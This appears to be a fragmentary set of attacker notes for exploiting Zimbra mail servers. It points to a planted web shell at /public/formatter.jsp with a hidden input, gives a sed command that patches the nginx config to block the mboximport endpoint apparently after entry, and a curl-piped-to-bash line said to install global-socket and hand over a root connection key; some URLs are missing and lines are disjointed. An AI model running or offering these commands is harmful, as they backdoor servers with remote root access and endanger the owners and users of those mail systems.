shell path: /public/formatter.jsp
Nuclei itself:
shell have hidden input with 0 opacity, so just hover mouse over it, type command, then press [Enter] key:
example shell url:
issue this command (but only once):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
need additional code to servers with not Nginx but Apache. Pull requests are wellcome.
curl -fskSL | bash 2>&1
this command will install global-socket ( and pass you the key to connect as root.
happy birthday massacre, motherfuckers ;)